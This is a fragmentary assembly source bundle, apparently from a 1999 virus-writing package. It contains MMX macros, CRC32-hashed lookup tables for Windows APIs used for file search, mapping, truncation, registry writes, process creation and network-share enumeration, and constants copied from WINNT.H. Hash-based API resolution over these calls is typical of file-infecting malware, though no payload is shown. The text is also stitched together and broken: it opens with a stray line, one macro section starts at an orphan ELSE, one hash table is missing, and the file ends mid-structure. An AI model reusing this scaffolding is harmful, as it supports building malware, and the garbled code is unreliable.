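```

If a sample uses different init or polynomial constants, pass them to string_crc32 and rebuild the table; the check against the "123456789" reference value tells you whether the standard pair is in use.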
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[GET_APIS.ASM]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MMX.INC]ÄÄÄ
;****************************************************************************
;* *
;* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY *
;* KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE *
;* IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A PARTICULAR *
;* PURPOSE. *
;* *
;* Copyright (C) 1997 Intel Corporation. All Rights Reserved. *
;* *
;****************************************************************************
.486P
ELSE
MM0 TEXTEQU <EAX>
MM1 TEXTEQU <ECX>
MM2 TEXTEQU <EDX>
MM3 TEXTEQU <EBX>
MM4 TEXTEQU <ESP>
MM5 TEXTEQU <EBP>
MM6 TEXTEQU <ESI>
MM7 TEXTEQU <EDI>
UnDefineMMxRegs Macro
MM0 TEXTEQU <MM0>
MM1 TEXTEQU <MM1>
MM2 TEXTEQU <MM2>
MM3 TEXTEQU <MM3>
MM4 TEXTEQU <MM4>
MM5 TEXTEQU <MM5>
MM6 TEXTEQU <MM6>
MM7 TEXTEQU <MM7>
rdpmc macro
db 0fh, opc_Rdpmc
endm
emms macro
db 0fh, opc_Emms
endm
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
movd1 macro dst:req, src:req ; MMX->EXX
local x, y
DefineMMxNUM
DefineMMxRegs
x:
cmpxchg dst, src
y:
org x+1
byte opc_Movd_st
org y
UnDefineMMxRegs
endm
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
movd2 macro dst:req, src:req ; MEM || EXX || MMX -> MMX
local x, y
DefineMMxNUM
DefineMMxRegs
x:
cmpxchg src, dst
y:
org x+1
byte opc_Movd_ld
org y
UnDefineMMxRegs
endm
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
movd3 macro dst:req, src:req ; MMX -> MEM
local x, y
DefineMMxNUM
DefineMMxRegs
x:
cmpxchg dst, src
y:
org x+1
byte opc_Movd_st
org y
UnDefineMMxRegs
endm
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
movq1 macro dst:req, src:req
local x, y
DefineMMxRegs
x:
cmpxchg src, dst
y:
org x+1
byte opc_Movq_ld
org y
UnDefineMMxRegs
endm
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
movq2 macro dst:req, src:req
local x, y
DefineMMxRegs
x:
cmpxchg dst, src
y:
org x+1
byte opc_Movq_st
org y
UnDefineMMxRegs
endm
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
packssdw macro dst:req, src:req
local x, y
DefineMMxRegs
x:
cmpxchg src, dst
y:
org x+1
byte opc_Packssdw
org y
UnDefineMMxRegs
endm
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
pslld1 macro dst:req, src:req ;; constant
local x, y
DefineMMxRegs
x:
btr dst, src
y:
org x+1
byte opc_PSHimd
org y
UnDefineMMxRegs
endm
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
pslld2 macro dst:req, src:req
local x, y
DefineMMxRegs
x:
cmpxchg src, dst
y:
org x+1
byte opc_Pslld
org y
UnDefineMMxRegs
endm
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
psrlq1 macro dst:req, src:req
local x, y
DefineMMxRegs
x:
cmpxchg dst,MM2
byte src
y:
org x+1
byte opc_PSHimq
org y
UnDefineMMxRegs
endm
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
psllq1 macro dst:req, src:req
local x, y
DefineMMxRegs
x:
btr dst, src
y:
org x+1
byte opc_PSHimq
org y
UnDefineMMxRegs
endm
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
psllq2 macro dst:req, src:req
local x, y
DefineMMxRegs
x:
cmpxchg src, dst
y:
org x+1
byte opc_Psllq
org y
UnDefineMMxRegs
endm
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
k32 dd 0
a32 dd 0
u32 dd 0
g32 dd 0
m32 dd 0
getmodulehandle: noter <GetModuleHandleA>
getmodulehandlelen = $-offset getmodulehandle
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
kernel32apis label
crc32 <LoadLibraryA>
crc32 <GetProcAddress>
crc32 <ExitProcess>
crc32 <CreateThread>
crc32 <ExitThread>
crc32 <SuspendThread>
crc32 <ResumeThread>
crc32 <SetThreadPriority>
crc32 <WaitForSingleObject>
crc32 <WaitForMultipleObjects>
crc32 <WaitForMultipleObjectsEx>
crc32 <CreateFileA>
crc32 <CreateFileMappingA>
crc32 <MapViewOfFile>
crc32 <UnmapViewOfFile>
crc32 <CloseHandle>
crc32 <GetFileAttributesA>
crc32 <GetFileAttributesExA>
crc32 <SetFileAttributesA>
crc32 <GetFileTime>
crc32 <SetFileTime>
crc32 <SetFilePointer>
crc32 <SetEndOfFile>
crc32 <DeleteFileA>
crc32 <FindFirstFileA>
crc32 <FindNextFileA>
crc32 <FindClose>
crc32 <lstrlen>
crc32 <lstrcpy>
crc32 <lstrcat>
crc32 <GetSystemDirectoryA>
crc32 <GetWindowsDirectoryA>
crc32 <GetCurrentDirectoryA>
crc32 <SetCurrentDirectoryA>
crc32 <GetSystemTime>
crc32 <GetTickCount>
crc32 <IsBadReadPtr>
crc32 <CreateSemaphoreA>
crc32 <ReleaseSemaphore>
crc32 <MoveFileA>
crc32 <MoveFileExA>
crc32 <OpenFile>
crc32 <CreateProcessA>
crc32 <WinExec>
crc32 <CopyFileA>
crc32 <CopyFileExA>
crc32 <GetFullPathNameA>
crc32 <GetCompressedFileSizeA>
crc32 <GetDriveTypeA>
crc32 <GetVersionExA>
crc32 <VirtualAlloc>
crc32 <FatalAppExitA>
crc32 <GetFileSize>
crc32 <IsBadWritePtr>
crc32 <GetModuleHandleA>
crc32 <Sleep>
crc32 <GlobalAlloc>
crc32 <GlobalFree>
crc32 <GetModuleFileNameA>
crc32 <WritePrivateProfileStringA>
dd 0
kernel32addr label
_LoadLibraryA dd 0
_GetProcAddress dd 0
_ExitProcess dd 0
_CreateThread dd 0
_ExitThread dd 0
_SuspendThread dd 0
_ResumeThread dd 0
_SetThreadPriority dd 0
_WaitForSingleObject dd 0
_WaitForMultipleObjects dd 0
_WaitForMultipleObjectsEx dd 0
_CreateFileA dd 0
_CreateFileMappingA dd 0
_MapViewOfFile dd 0
_UnmapViewOfFile dd 0
_CloseHandle dd 0
_GetFileAttributesA dd 0
_GetFileAttributesExA dd 0
_SetFileAttributesA dd 0
_GetFileTime dd 0
_SetFileTime dd 0
_SetFilePointer dd 0
_SetEndOfFile dd 0
_DeleteFileA dd 0
_FindFirstFileA dd 0
_FindNextFileA dd 0
_FindClose dd 0
_lstrlen dd 0
_lstrcpy dd 0
_lstrcat dd 0
_GetSystemDirectoryA dd 0
_GetWindowsDirectoryA dd 0
_GetCurrentDirectoryA dd 0
_SetCurrentDirectoryA dd 0
_GetSystemTime dd 0
_GetTickCount dd 0
_IsBadReadPtr dd 0
_CreateSemaphoreA dd 0
_ReleaseSemaphore dd 0
_MoveFileA dd 0
_MoveFileExA dd 0
_OpenFile dd 0
_CreateProcessA dd 0
_WinExec dd 0
_CopyFileA dd 0
_CopyFileExA dd 0
_GetFullPathNameA dd 0
_GetCompressedFileSizeA dd 0
_GetDriveTypeA dd 0
_GetVersionExA dd 0
_VirtualAlloc dd 0
_FatalAppExitA dd 0
_GetFileSize dd 0
_IsBadWritePtr dd 0
_GetModuleHandleA dd 0
_Sleep dd 0
_GlobalAlloc dd 0
_GlobalFree dd 0
_GetModuleFileNameA dd 0
_WritePrivateProfileStringA dd 0
kernel32func = ($-offset kernel32addr)/4
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
advapi32apis label
crc32 <RegOpenKeyExA>
crc32 <RegQueryValueExA>
crc32 <RegQueryInfoKeyA>
crc32 <RegEnumValueA>
crc32 <RegSetValueExA>
crc32 <RegCreateKeyExA>
crc32 <RegCloseKey>
dd 0
advapi32addr label
_RegOpenKeyExA dd 0
_RegQueryValueExA dd 0
_RegQueryInfoKeyA dd 0
_RegEnumValueA dd 0
_RegSetValueExA dd 0
_RegCreateKeyExA dd 0
_RegCloseKey dd 0
user32addr label
_SetTimer dd 0
_KillTimer dd 0
_FindWindowA dd 0
_PostMessageA dd 0
_MessageBoxA dd 0
_CharUpperBuffA dd 0
_LoadIconA dd 0
_LoadCursorA dd 0
_GetWindowDC dd 0
_GetClientRect dd 0
_BeginPaint dd 0
_EndPaint dd 0
_GetSystemMetrics dd 0
_GetDC dd 0
_InvalidateRect dd 0
_ShowWindow dd 0
_UpdateWindow dd 0
_GetMessageA dd 0
_TranslateMessage dd 0
_DispatchMessageA dd 0
_PostQuitMessage dd 0
_DefWindowProcA dd 0
_RegisterClassExA dd 0
_CreateWindowExA dd 0
_DestroyWindow dd 0
user32func = ($-offset user32addr)/4
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
gdi32apis label
crc32 <GetStockObject>
crc32 <GetCharWidthA>
crc32 <TextOutA>
crc32 <GetTextMetricsA>
gdi32addr label
_GetStockObject dd 0
_GetCharWidthA dd 0
_TextOutA dd 0
_GetTextMetricsA dd 0
gdi32func = ($-offset gdi32addr)/4
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
mpr32apis label
crc32 <WNetOpenEnumA>
crc32 <WNetEnumResourceA>
crc32 <WNetCloseEnum>
mpr32addr label
_WNetOpenEnumA dd 0
_WNetEnumResourceA dd 0
_WNetCloseEnum dd 0
mpr32func = ($-offset mpr32addr)/4
;------
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[RAMMDATA.INC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[W32NT_LJ.INC]ÄÄÄ
comment $
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄ¿ ÚÄ¿
³ ³ This is my transformation of the original WINNT.H ³ ³
³ ³ file from the Microsoft Windows SDK(C) for Windows NT 5.0 ³ ³
³ ³ beta 2 and Windows 98, released in Sept. 1998. ³ ³
³ ³ This file was transformed by me from the original C ³ ³
³ ³ definition into assembly language. You can use this file to ³ ³
³ ³ quicken up writing your win32 programs in assembler. You ³ ³
³ ³ can use these files as you wish, as they are freeware. ³ ³
³ ³ ³ ³
³ ³ However, if you find any mistake inside this file, ³ ³
³ ³ it is probably due to the fact that I merely could see the ³ ³
³ ³ monitor while converting the files. So, if you do notice ³ ³
³ ³ something, please notify me on my e-mail address at: ³ ³
³ ³ ³ ³
³ ³ lordjulus@geocities.com ³ ³
³ ³ ³ ³
³ ³ Also, if you find any other useful stuff that can be ³ ³
³ ³ included here, do not hesitate to tell me. ³ ³
³ ³ ³ ³
³ ³ Good luck, ³ ³
³ ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ ³
³ ³ ³ Lord Julus (c) 1999 ³ ³ ³
³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ ³
³ ³ ³ ³
ÀÄÙ ÀÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
DRIVE_UNKNOWN EQU 0
DRIVE_NO_ROOT_DIR EQU 1
DRIVE_REMOVABLE EQU 2
DRIVE_FIXED EQU 3
DRIVE_REMOTE EQU 4
DRIVE_CDROM EQU 5
DRIVE_RAMDISK EQU 6
DLL_PROCESS_ATTACH EQU 1
DLL_THREAD_ATTACH EQU 2
DLL_THREAD_DETACH EQU 3
DLL_PROCESS_DETACH EQU 0
TC_NORMAL EQU 0
TC_HARDERR EQU 1
TC_GP_TRAP EQU 2
TC_SIGNAL EQU 3
EXCEPTION_DEBUG_EVENT EQU 1
CREATE_THREAD_DEBUG_EVENT EQU 2
CREATE_PROCESS_DEBUG_EVENT EQU 3
EXIT_THREAD_DEBUG_EVENT EQU 4
EXIT_PROCESS_DEBUG_EVENT EQU 5
LOAD_DLL_DEBUG_EVENT EQU 6
UNLOAD_DLL_DEBUG_EVENT EQU 7
OUTPUT_DEBUG_STRING_EVENT EQU 8
RIP_EVENT EQU 9
PROCESSOR_ARCHITECTURE_INTEL EQU 0
PROCESSOR_ARCHITECTURE_MIPS EQU 1
PROCESSOR_ARCHITECTURE_ALPHA EQU 2
PROCESSOR_ARCHITECTURE_PPC EQU 3
PROCESSOR_ARCHITECTURE_SHX EQU 4
PROCESSOR_ARCHITECTURE_ARM EQU 5
PROCESSOR_ARCHITECTURE_IA64 EQU 6
PROCESSOR_ARCHITECTURE_ALPHA64 EQU 7
PROCESSOR_ARCHITECTURE_UNKNOWN EQU 0FFFFh
PF_FLOATING_POINT_PRECISION_ERRATA EQU 0
PF_FLOATING_POINT_EMULATED EQU 1
PF_COMPARE_EXCHANGE_DOUBLE EQU 2
PF_MMX_INSTRUCTIONS_AVAILABLE EQU 3
PF_PPC_MOVEMEM_64BIT_OK EQU 4
PF_ALPHA_BYTE_INSTRUCTIONS EQU 5
PF_XMMI_INSTRUCTIONS_AVAILABLE EQU 6
PF_AMD3D_INSTRUCTIONS_AVAILABLE EQU 7
PF_RDTSC_INSTRUCTION_AVAILABLE EQU 8
SYSTEM_FLAG_REMOTE_BOOT_CLIENT EQU 00000001h
SYSTEM_FLAG_DISKLESS_CLIENT EQU 00000002h
INVALID_HANDLE_VALUE EQU -1
INVALID_FILE_SIZE EQU 0FFFFFFFFh
STD_INPUT_HANDLE EQU -10
STD_OUTPUT_HANDLE EQU -11
STD_ERROR_HANDLE EQU -12
MAILSLOT_NO_MESSAGE EQU -1
MAILSLOT_WAIT_FOREVER EQU -1
CREATE_NEW EQU 1
CREATE_ALWAYS EQU 2
OPEN_EXISTING EQU 3
OPEN_ALWAYS EQU 4
TRUNCATE_EXISTING EQU 5
HINSTANCE_ERROR EQU 32
FILE_ENCRYPTABLE EQU 0
FILE_IS_ENCRYPTED EQU 1
FILE_SYSTEM_ATTR EQU 2
FILE_ROOT_DIR EQU 3
FILE_SYSTEM_DIR EQU 4
FILE_UNKNOWN EQU 5
FILE_SYSTEM_NOT_SUPPORT EQU 6
FILE_USER_DISALLOWED EQU 7
FILE_READ_ONLY EQU 8
EXCEPTION_NONCONTINUABLE EQU 1
EXCEPTION_MAXIMUM_PARAMETERS EQU 15
VER_PLATFORM_WIN32s EQU 0
VER_PLATFORM_WIN32_WINDOWS EQU 1
VER_PLATFORM_WIN32_NT EQU 2
VER_EQUAL EQU 1
VER_GREATER EQU 2
VER_GREATER_EQUAL EQU 3
VER_LESS EQU 4
VER_LESS_EQUAL EQU 5
VER_AND EQU 6
VER_OR EQU 7
; PE File Characteristics
; PE Machine type
IMAGE_FILE_MACHINE_UNKNOWN EQU 0
IMAGE_FILE_MACHINE_I386 EQU 014ch ; Intel 386.
IMAGE_FILE_MACHINE_R3000 EQU 0162h ; MIPS little-endian, 160 big-endian
IMAGE_FILE_MACHINE_R4000 EQU 0166h ; MIPS little-endian
IMAGE_FILE_MACHINE_R10000 EQU 0168h ; MIPS little-endian
IMAGE_FILE_MACHINE_WCEMIPSV2 EQU 0169h ; MIPS little-endian WCE v2
IMAGE_FILE_MACHINE_ALPHA EQU 0184h ; Alpha_AXP
IMAGE_FILE_MACHINE_POWERPC EQU 01F0h ; IBM PowerPC Little-Endian
IMAGE_FILE_MACHINE_SH3 EQU 01a2h ; SH3 little-endian
IMAGE_FILE_MACHINE_SH3E EQU 01a4h ; SH3E little-endian
IMAGE_FILE_MACHINE_SH4 EQU 01a6h ; SH4 little-endian
IMAGE_FILE_MACHINE_ARM EQU 01c0h ; ARM Little-Endian
IMAGE_FILE_MACHINE_THUMB EQU 01c2h
IMAGE_FILE_MACHINE_IA64 EQU 0200h ; Intel 64
IMAGE_FILE_MACHINE_MIPS16 EQU 0266h ; MIPS
IMAGE_FILE_MACHINE_MIPSFPU EQU 0366h ; MIPS
IMAGE_FILE_MACHINE_MIPSFPU16 EQU 0466h ; MIPS
IMAGE_FILE_MACHINE_ALPHA64 EQU 0284h ; ALPHA64
IMAGE_FILE_MACHINE_AXP64 EQU IMAGE_FILE_MACHINE_ALPHA64
IMAGE_NUMBEROF_DIRECTORY_ENTRIES EQU 16
IMAGE_SIZEOF_STD_OPTIONAL_HEADER EQU 28
IMAGE_SIZEOF_NT_OPTIONAL_HEADER EQU 224
IMAGE_NT_OPTIONAL_HDR_MAGIC EQU 10bh
; Directory Entries
IMAGE_SIZEOF_SHORT_NAME EQU 8
IMAGE_SIZEOF_SECTION_HEADER EQU 40
; Section Characteristics
IMAGE_SIZEOF_SYMBOL EQU 18
IMAGE_SYM_CLASS_END_OF_FUNCTION EQU -1
IMAGE_SYM_CLASS_NULL EQU 0000h
IMAGE_SYM_CLASS_AUTOMATIC EQU 0001h
IMAGE_SYM_CLASS_EXTERNAL EQU 0002h
IMAGE_SYM_CLASS_STATIC EQU 0003h
IMAGE_SYM_CLASS_REGISTER EQU 0004h
IMAGE_SYM_CLASS_EXTERNAL_DEF EQU 0005h
IMAGE_SYM_CLASS_LABEL EQU 0006h
IMAGE_SYM_CLASS_UNDEFINED_LABEL EQU 0007h
IMAGE_SYM_CLASS_MEMBER_OF_STRUCT EQU 0008h
IMAGE_SYM_CLASS_ARGUMENT EQU 0009h
IMAGE_SYM_CLASS_STRUCT_TAG EQU 000Ah
IMAGE_SYM_CLASS_MEMBER_OF_UNION EQU 000Bh
IMAGE_SYM_CLASS_UNION_TAG EQU 000Ch
IMAGE_SYM_CLASS_TYPE_DEFINITION EQU 000Dh
IMAGE_SYM_CLASS_UNDEFINED_STATIC EQU 000Eh
IMAGE_SYM_CLASS_ENUM_TAG EQU 000Fh
IMAGE_SYM_CLASS_MEMBER_OF_ENUM EQU 0010h
IMAGE_SYM_CLASS_REGISTER_PARAM EQU 0011h
IMAGE_SYM_CLASS_BIT_FIELD EQU 0012h
IMAGE_SIZEOF_AUX_SYMBOL EQU 18
IMAGE_COMDAT_SELECT_NODUPLICATES EQU 1
IMAGE_COMDAT_SELECT_ANY EQU 2
IMAGE_COMDAT_SELECT_SAME_SIZE EQU 3
IMAGE_COMDAT_SELECT_EXACT_MATCH EQU 4
IMAGE_COMDAT_SELECT_ASSOCIATIVE EQU 5
IMAGE_COMDAT_SELECT_LARGEST EQU 6
IMAGE_COMDAT_SELECT_NEWEST EQU 7
IMAGE_WEAK_EXTERN_SEARCH_NOLIBRARY EQU 1
IMAGE_WEAK_EXTERN_SEARCH_LIBRARY EQU 2
IMAGE_WEAK_EXTERN_SEARCH_ALIAS EQU 3
IMAGE_SIZEOF_RELOCATION EQU 10
IMAGE_SIZEOF_LINENUMBER EQU 6
IMAGE_SIZEOF_BASE_RELOCATION EQU 8
IMAGE_REL_BASED_ABSOLUTE EQU 0
IMAGE_REL_BASED_HIGH EQU 1
IMAGE_REL_BASED_LOW EQU 2
IMAGE_REL_BASED_HIGHLOW EQU 3
IMAGE_REL_BASED_HIGHADJ EQU 4
IMAGE_REL_BASED_MIPS_JMPADDR EQU 5
IMAGE_REL_BASED_SECTION EQU 6
IMAGE_REL_BASED_REL32 EQU 7
IMAGE_REL_BASED_MIPS_JMPADDR16 EQU 9
IMAGE_REL_BASED_IA64_IMM64 EQU 9
IMAGE_REL_BASED_DIR64 EQU 10
IMAGE_REL_BASED_HIGH3ADJ EQU 11
IMAGE_DEBUG_TYPE_UNKNOWN EQU 0
IMAGE_DEBUG_TYPE_COFF EQU 1
IMAGE_DEBUG_TYPE_CODEVIEW EQU 2
IMAGE_DEBUG_TYPE_FPO EQU 3
IMAGE_DEBUG_TYPE_MISC EQU 4
IMAGE_DEBUG_TYPE_EXCEPTION EQU 5
IMAGE_DEBUG_TYPE_FIXUP EQU 6
IMAGE_DEBUG_TYPE_OMAP_TO_SRC EQU 7
IMAGE_DEBUG_TYPE_OMAP_FROM_SRC EQU 8
IMAGE_DEBUG_TYPE_BORLAND EQU 9
IMAGE_DEBUG_TYPE_RESERVED10 EQU 10
IMAGE_DEBUG_MISC_EXENAME EQU 1
; G = GLOBAL
; L = LOCAL (NB. IN WIN95/98/NT GLOBAL=LOCAL)
; Relocation format.
COMMENT $
; Thread Local Storage
IMAGE_TLS_DIRECTORY32 STRUC
TLS_StartAddressOfRawData DD BYTE PTR ?
TLS_EndAddressOfRawData DD BYTE PTR ?
TLS_AddressOfIndex DD BYTE PTR ?
TLS_AddressOfCallBacks DD IMAGE_TLS_CALLBACK PTR ?
TLS_SizeOfZeroFill DD 0
TLS_Characteristics DD 0
ENDS
$
IMAGE_BOUND_IMPORT_DESCRIPTOR STRUC ;
BID_TimeDateStamp DD ? ;
BID_OffsetModuleName DW ? ;
BID_NumberOfModuleForwarderRefs DW ? ;
IMAGE_BOUND_IMPORT_DESCRIPTOR ENDS ;
IMAGE_BOUND_FORWARDER_REF STRUC ;
BFR_TimeDateStamp DD ? ;
BFR_OffsetModuleName DW ? ;
BFR_Reserved DW ? ;
IMAGE_BOUND_FORWARDER_REF ENDS ;
IMAGE_RESOURCE_DIRECTORY STRUC ;
RD_Characteristics DD ? ;
RD_TimeDateStamp DD ? ;
RD_MajorVersion DW ? ;
RD_MinorVersion DW ? ;
RD_NumberOfNamedEntries DW ? ;
RD_NumberOfIdEntries DW ? ;
IMAGE_RESOURCE_DIRECTORY ENDS ;
IMAGE_RESOURCE_DIRECTORY_SIZE = SIZE IMAGE_RESOURCE_DIRECTORY
IMAGE_RESOURCE_DIRECTORY_ENTRY STRUC ;
UNION ;
STRUC ;
RDE_Offset RECORD { ;
RDE_NameOffset:31 ;
RDE_NameIsString:1 } ;
ENDS ;
RDE_Name DD ? ;
RDE_Id DW ? ;
ENDS ;
UNION ;
RDE_OffsetToData DD ? ;
STRUC ;
RDE_Directory RECORD { ;
RDE_OffsetToDirectory:31 ;
RDE_DataIsDirectory:1 } ;
ENDS ;
ENDS ;
IMAGE_RESOURCE_DIRECTORY_ENTRY ENDS ;
IMAGE_RESOURCE_DIRECTORY_STRING STRUC ;
RDS_Length DW ? ;
RDS_NameString DB 1 DUP(?) ;
IMAGE_RESOURCE_DIRECTORY_STRING ENDS ;
IMAGE_RESOURCE_DIR_STRING_U STRUC ;
RDSU_Length DW ? ;
RDSU_NameString DB 1 DUP (?) ;
ENDS ;
IMAGE_RESOURCE_DATA_ENTRY STRUC ;
REDE_OffsetToData DD ? ;
REDE_Size DD ? ;
REDE_CodePage DD ? ;
REDE_Reserved DD ? ;
IMAGE_RESOURCE_DATA_ENTRY ENDS ;
IMAGE_DEBUG_DIRECTORY STRUC ;
DD_Characteristics DD ? ;
DD_TimeDateStamp DD ? ;
DD_MajorVersion DW ? ;
DD_MinorVersion DW ? ;
DD_Type DD ? ;
DD_SizeOfData DD ? ;
DD_AddressOfRawData DD BYTE PTR ? ;
DD_PointerToRawData DD BYTE PTR ? ;
IMAGE_DEBUG_DIRECTORY ENDS ;
IMAGE_COFF_SYMBOLS_HEADER STRUC ;
CSH_NumberOfSymbols DD ? ;
CSH_LvaToFirstSymbol DD BYTE PTR ? ;
CSH_NumberOfLinenumbers DD ? ;
CSH_LvaToFirstLinenumber DD BYTE PTR ? ;
CSH_RvaToFirstByteOfCode DD BYTE PTR ? ;
CSH_RvaToLastByteOfCode DD BYTE PTR ? ;
CSH_RvaToFirstByteOfData DD BYTE PTR ? ;
CSH_RvaToLastByteOfData DD BYTE PTR ? ;
IMAGE_COFF_SYMBOLS_HEADER ENDS ;
IMAGE_DEBUG_MISC STRUC ;
DM_DataType DD ? ; type of misc data, see defines
DM_Length DD ? ; total length of record, rounded to four
DM_Unicode DB ? ; TRUE if data is unicode string
DM_Reserved DB 3 DUP(?) ;
DM_Data DB 1 DUP(?) ; Actual data
IMAGE_DEBUG_MISC ENDS ;
IMAGE_SEPARATE_DEBUG_HEADER STRUC ;
SDH_Signature DW ? ;
SDH_Flags DW ? ;
SDH_Machine DW ? ;
SDH_Characteristics DW ? ;
SDH_TimeDateStamp DD ? ;
SDH_CheckSum DD ? ;
SDH_ImageBase DD BYTE PTR ? ;
SDH_SizeOfImage DD ? ;
SDH_NumberOfSections DD ? ;
SDH_ExportedNamesSize DD ? ;
SDH_DebugDirectorySize DD ? ;
SDH_SectionAlignment DD ? ;
SDH_Reserved DD 2 DUP (?) ;
IMAGE_SEPARATE_DEBUG_HEADER ENDS ;
IMPORT_OBJECT_HEADER STRUC ;
OH_Sig1 DW ? ; Must be IMAGE_FILE_MACHINE_UNKNOWN
OH_Sig2 DW ? ; Must be IMPORT_OBJECT_HDR_SIG2.
OH_Version DW ? ;
OH_Machine DW ? ;
OH_TimeDateStamp DD ? ; Time/date stamp
OH_SizeOfData DD ? ; particularly useful for incremental links
UNION ;
OH_Ordinal DW ? ; if grf & IMPORT_OBJECT_ORDINAL
OH_Hint DW ? ;
ENDS ;
OH_ImportType RECORD { ;
OH_Type : 2 ; IMPORT_TYPE
OH_NameType : 3 ; IMPORT_NAME_TYPE
OH_Reserved : 11 } ; Reserved. Must be zero.
IMPORT_OBJECT_HEADER ENDS ;
FLOATING_SAVE_AREA STRUC
ControlWord DD ?
StatusWord DD ?
TagWord DD ?
ErrorOffset DD ?
ErrorSelector DD ?
DataOffset DD ?
DataSelector DD ?
RegisterArea DB SIZE_OF_80387_REGISTERS DUP(?)
Cr0NpxState DD ?
FLOATING_SAVE_AREA ENDS
CONTEXT STRUC
CONTEXT_ContextFlags DD ?
CONTEXT_Dr0 DD ?
CONTEXT_Dr1 DD ?
CONTEXT_Dr2 DD ?
CONTEXT_Dr3 DD ?
CONTEXT_Dr6 DD ?
CONTEXT_Dr7 DD ?
CONTEXT_FloatSave FLOATING_SAVE_AREA ?
CONTEXT_SegGs DD ?
CONTEXT_SegFs DD ?
CONTEXT_SegEs DD ?
